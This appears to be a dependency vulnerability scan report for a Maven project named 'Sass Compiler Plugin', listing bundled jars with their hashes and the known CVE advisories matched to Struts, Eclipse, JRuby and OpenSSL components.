File Path: /var/tmp/maven-repo/org/apache/maven/maven-repository-metadata/3.3.9/maven-repository-metadata-3.3.9.jar
MD5: a518f665a8e0c80cd7b37d7e19e90095
SHA1: 6850232b35e504057d67bde11efddebf6271e1ce
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-settings-builder-3.3.9.jar

Description: The effective settings builder, with inheritance and password decryption.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-settings-builder/3.3.9/maven-settings-builder-3.3.9.jar
MD5: 20834b05fa4db46b67c963f3e1b91ed5
SHA1: fe5ad82564dc07a31855da543db8d5376def3c26
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-settings-3.3.9.jar

Description: Maven Settings model.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-settings/3.3.9/maven-settings-3.3.9.jar
MD5: 9d67ab18c16b98763ee9142e87b62d22
SHA1: 68d4180c51468ae8f45869f8f9c569092262fcca
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-plugin-annotations-3.4.jar

Description: Java 5 annotations to use in Mojos

File Path: /var/tmp/maven-repo/org/apache/maven/plugin-tools/maven-plugin-annotations/3.4/maven-plugin-annotations-3.4.jar
MD5: c35fde211323d4bb06d5b1a41ef23807
SHA1: 18624421fb35f5ade7397c18b40878396f672bc5
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-reporting-api-3.0.jar

Description: API to manage report generation.

File Path: /var/tmp/maven-repo/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar
MD5: 48cd00abc388c5156879b335e869adab
SHA1: b2541dd07d08cd5eff9bd4554a2ad6a4198e2dfe
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-reporting-impl-2.4.jar

Description: Abstract classes to manage report generation.

File Path: /var/tmp/maven-repo/org/apache/maven/reporting/maven-reporting-impl/2.4/maven-reporting-impl-2.4.jar
MD5: dcee359d96eb75ba8665dded8f117d23
SHA1: 90004c570cfad44712cc42a4ee8167e13f227420
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-shared-utils-0.8.jar

File Path: /var/tmp/maven-repo/org/apache/maven/shared/maven-shared-utils/0.8/maven-shared-utils-0.8.jar
MD5: b94a3d2b3e177dfcac19d8980d03099b
SHA1: bb2d10333e4c7c4cdc25f3c1acb34a74c098568c
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-shared-utils-0.8.jar/META-INF/maven/commons-io/commons-io/pom.xml

Description:  The Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

File Path: /var/tmp/maven-repo/org/apache/maven/shared/maven-shared-utils/0.8/maven-shared-utils-0.8.jar/META-INF/maven/commons-io/commons-io/pom.xml
MD5: 8dcc8cd4255c1f23e7f58780a943cefb
SHA1: 1ef24807b2eaf9d51b5587710878146d630cc855

Identifiers

  • maven: commons-io:commons-io:2.2   Confidence:HIGH

wagon-provider-api-2.10.jar

Description: Maven Wagon API that defines the contract between different Wagon implementations

File Path: /var/tmp/maven-repo/org/apache/maven/wagon/wagon-provider-api/2.10/wagon-provider-api-2.10.jar
MD5: d03edb1bcae2b9c32a6b68c8333b4b6d
SHA1: 0cd9cdde3f56bb5250d87c54592f04cbc24f03bf
Referenced In Project: Sass Compiler Plugin

Identifiers

struts-core-1.3.8.jar

File Path: /var/tmp/maven-repo/org/apache/struts/struts-core/1.3.8/struts-core-1.3.8.jar
MD5: 868de456b4d4331d6dcc4e8d3bee884e
SHA1: 66178d4a9279ebb1cd1eb79c10dc204b4199f061
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions: (show all)

struts-taglib-1.3.8.jar

File Path: /var/tmp/maven-repo/org/apache/struts/struts-taglib/1.3.8/struts-taglib-1.3.8.jar
MD5: 0effb2e71f676c25d76c3ae5dd6674f9
SHA1: e87e9817bdf03c2367fb5f6d5ead953db2df4c21
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions: (show all)

struts-tiles-1.3.8.jar

File Path: /var/tmp/maven-repo/org/apache/struts/struts-tiles/1.3.8/struts-tiles-1.3.8.jar
MD5: f41992ab2729b1cb9c6b4721465aa4e4
SHA1: 6d212f8ea5d908bc9906e669428b7694dff60785
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions: (show all)

velocity-tools-2.0.jar

Description:  VelocityTools is an integrated collection of Velocity subprojects with the common goal of creating tools and infrastructure to speed and ease development of both web and non-web applications using the Velocity template engine.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.jar
MD5: 51ed2c6c0103cf3fdbeb9aa5170f5288
SHA1: 69936384de86857018b023a8c56ae0635c56b6a0
Referenced In Project: Sass Compiler Plugin

Identifiers

velocity-1.5.jar

Description: Apache Velocity is a general purpose template engine.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/apache/velocity/velocity/1.5/velocity-1.5.jar
MD5: 8d46d30a37e1cf2047cdfa73c552e8a9
SHA1: 09f306baf7523ffc0e81a6353d08a584d254133b
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-classworlds-2.5.2.jar

Description: A class loader framework

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar
MD5: 53b54feee8cef6b843bd6748bda4bfa7
SHA1: 4abb111bfdace5b8167db4c0ef74644f3f88f142
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-component-annotations-1.6.jar

Description:  Plexus Component "Java 5" Annotations, to describe plexus components properties in java sources with standard annotations instead of javadoc annotations.

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.jar
MD5: 5ad66cc6f2b6813485d624ed581d61be
SHA1: 1a34a4e12b5fded8c548a568f463dfee21500927
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-container-default-1.0-alpha-9-stable-1.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar
MD5: 99533a9d3e0fa3280cd0bd3426c5f99b
SHA1: 94aea3010e250a334d9dab7f591114cd6c767458
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-i18n-1.0-beta-7.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-i18n/1.0-beta-7/plexus-i18n-1.0-beta-7.jar
MD5: 65d4f673bd0c49dbc67e020e96b00753
SHA1: 3690f10a668b3c7ac2ef563f14cfb6b2ba30ee57
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-interpolation-1.21.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-interpolation/1.21/plexus-interpolation-1.21.jar
MD5: 6629656495f4e5eac4f244fe3b252ea1
SHA1: f92de59d295f16868001644acc21720f3ec9eb15
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-utils-3.0.22.jar

Description: A collection of various utility classes to ease working with strings, files, command lines, XML and more.

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar
MD5: 2a32677a099da7c5b9b2b39c066f2cc6
SHA1: 764f26e0ab13a87c48fe55f525dfb6a133b7a92f
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-velocity-1.1.7.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-velocity/1.1.7/plexus-velocity-1.1.7.jar
MD5: d460d060e07b3bccaf6593440ce7be1e
SHA1: 1440fc2552d1405b1c2d380ef3b96c4d9c6dbd0b
Referenced In Project: Sass Compiler Plugin

Identifiers

aether-api-1.0.2.v20150114.jar

Description:  The application programming interface for the repository system.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-api/1.0.2.v20150114/aether-api-1.0.2.v20150114.jar
MD5: 17cca827aa6a828de92225021df327a7
SHA1: 839f93a5213fb3e233b09bfd6d6b95669f7043c0
Referenced In Project: Sass Compiler Plugin

Identifiers

aether-impl-1.0.2.v20150114.jar

Description:  An implementation of the repository system.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-impl/1.0.2.v20150114/aether-impl-1.0.2.v20150114.jar
MD5: 90c5812e3e05a2419b47edd075920c3b
SHA1: f147539e6e60dfbda9ef7f6d750066170f61b7a1
Referenced In Project: Sass Compiler Plugin

Identifiers

aether-spi-1.0.2.v20150114.jar

Description:  The service provider interface for repository system implementations and repository connectors.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-spi/1.0.2.v20150114/aether-spi-1.0.2.v20150114.jar
MD5: 27c2dcac7a0cd4818874d2c14abfd34e
SHA1: 8428dfa330107984f3e3ac05cc3ebd50b2676866
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2010-4647  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE before 3.6.2 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) help/index.jsp or (2) help/advanced/content.jsp.

Vulnerable Software & Versions: (show all)

CVE-2008-7271  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.

Vulnerable Software & Versions: (show all)

aether-util-1.0.2.v20150114.jar

Description:  A collection of utility classes to ease usage of the repository system.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-util/1.0.2.v20150114/aether-util-1.0.2.v20150114.jar
MD5: ae0f47f571109fe3b7b40a7dea085714
SHA1: d2d3c74a5210544b5cdce89a2c1d1c62835692d1
Referenced In Project: Sass Compiler Plugin

Identifiers

org.eclipse.sisu.inject-0.3.2.jar

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar
MD5: d3cb5c4eafb5f15dbfb73ae34d630394
SHA1: 59044b92ec27cc6fda7a2d24b2cd6cec23f31d5b
Referenced In Project: Sass Compiler Plugin

Identifiers

org.eclipse.sisu.plexus-0.3.2.jar

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar
MD5: ffd4bd3eb3df02572248674218129cba
SHA1: cd84cb43788de23847eec2999070f64381bdb495
Referenced In Project: Sass Compiler Plugin

Identifiers

jruby-complete-9.1.2.0.jar

Description: JRuby 9.1.2.0 OSGi bundle

License:

http://www.gnu.org/licenses/gpl-3.0-standalone.html, http://www.gnu.org/licenses/lgpl-3.0-standalone.html, http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar
MD5: 5ec62f54f644c1e39e7dd4e418c82fc2
SHA1: 1ba9ec078d5c46583688110ddc7dec912d4c7763
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: jffi-1.2.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/jni/i386-Windows/jffi-1.2.dll
MD5: 841e60814ed6b2971a47b267aef1c58a
SHA1: 07d30c6407fefad8df4b6afc4d85f83e547975ca

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jffi-1.2.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/jni/x86_64-Windows/jffi-1.2.dll
MD5: 5d80b61c1f9e31860c17b3a410948e7e
SHA1: 5ca292116336ee4ceed00d10e756afea580e62cf

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jrubyw.exe

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/bin/jrubyw.exe
MD5: 62b31f26af4b2c0ffe078d17a10c1a7b
SHA1: b9ea7099f43ec31ee907326d4261d778aef9059a

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jar-dependencies-0.3.2.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/jar-dependencies-0.3.2.gemspec
MD5: 9aa4c85e42af99eee1c7436f8d9feea3
SHA1: c2802265d538f551f3c692eb6d65a81e37898819

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jruby-openssl-0.9.15-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/jruby-openssl-0.9.15-java.gemspec
MD5: a476df5aec0907a89cd9eb90af6992a0
SHA1: 07af4c1736cdeded00cb54aa5f230ee9630969ee

Identifiers

CVE-2016-2176  

Severity: Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data.

Vulnerable Software & Versions: (show all)

CVE-2016-2109  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding.

Vulnerable Software & Versions: (show all)

CVE-2016-2108  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the "negative zero" issue.

Vulnerable Software & Versions: (show all)

CVE-2016-2107  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session, NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.

Vulnerable Software & Versions: (show all)

CVE-2016-2106  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data.

Vulnerable Software & Versions: (show all)

CVE-2016-2105  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data.

Vulnerable Software & Versions: (show all)

CVE-2016-0704  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

An oracle protection mechanism in the get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a overwrites incorrect MASTER-KEY bytes during use of export cipher suites, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions: (show all)

CVE-2016-0703  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions: (show all)

CVE-2015-4000  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

Vulnerable Software & Versions: (show all)

CVE-2015-1792  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.

Vulnerable Software & Versions: (show all)

CVE-2015-1791  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.

Vulnerable Software & Versions: (show all)

CVE-2015-1790  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS7_dataDecodefunction in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.

Vulnerable Software & Versions: (show all)

CVE-2015-1789  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback.

Vulnerable Software & Versions: (show all)

CVE-2015-1788  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.

Vulnerable Software & Versions: (show all)

CVE-2015-1787  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The ssl3_get_client_key_exchange function in s3_srvr.c in OpenSSL 1.0.2 before 1.0.2a, when client authentication and an ephemeral Diffie-Hellman ciphersuite are enabled, allows remote attackers to cause a denial of service (daemon crash) via a ClientKeyExchange message with a length of zero.

Vulnerable Software & Versions:

CVE-2015-0293  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message.

Vulnerable Software & Versions: (show all)

CVE-2015-0292  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow.

Vulnerable Software & Versions: (show all)

CVE-2015-0291  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The sigalgs implementation in t1_lib.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by using an invalid signature_algorithms extension in the ClientHello message during a renegotiation.

Vulnerable Software & Versions:

CVE-2015-0290  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The multi-block feature in the ssl3_write_bytes function in s3_pkt.c in OpenSSL 1.0.2 before 1.0.2a on 64-bit x86 platforms with AES NI support does not properly handle certain non-blocking I/O cases, which allows remote attackers to cause a denial of service (pointer corruption and application crash) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2015-0289  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c.

Vulnerable Software & Versions: (show all)

CVE-2015-0288  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow attackers to cause a denial of service (NULL pointer dereference and application crash) via an invalid certificate key.

Vulnerable Software & Versions: (show all)

CVE-2015-0287  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse.

Vulnerable Software & Versions: (show all)

CVE-2015-0286  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions: (show all)

CVE-2015-0285  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_client_hello function in s3_clnt.c in OpenSSL 1.0.2 before 1.0.2a does not ensure that the PRNG is seeded before proceeding with a handshake, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by sniffing the network and then conducting a brute-force attack.

Vulnerable Software & Versions:

CVE-2015-0209  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import.

Vulnerable Software & Versions: (show all)

CVE-2015-0208  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ASN.1 signature-verification implementation in the rsa_item_verify function in crypto/rsa/rsa_ameth.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted RSA PSS parameters to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions:

CVE-2015-0207  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The dtls1_listen function in d1_lib.c in OpenSSL 1.0.2 before 1.0.2a does not properly isolate the state information of independent data streams, which allows remote attackers to cause a denial of service (application crash) via crafted DTLS traffic, as demonstrated by DTLS 1.0 traffic to a DTLS 1.2 server.

Vulnerable Software & Versions:

CVE-2015-0204  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations.

Vulnerable Software & Versions: (show all)

CVE-2014-8275  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.

Vulnerable Software & Versions: (show all)

CVE-2014-8176  

Severity: High
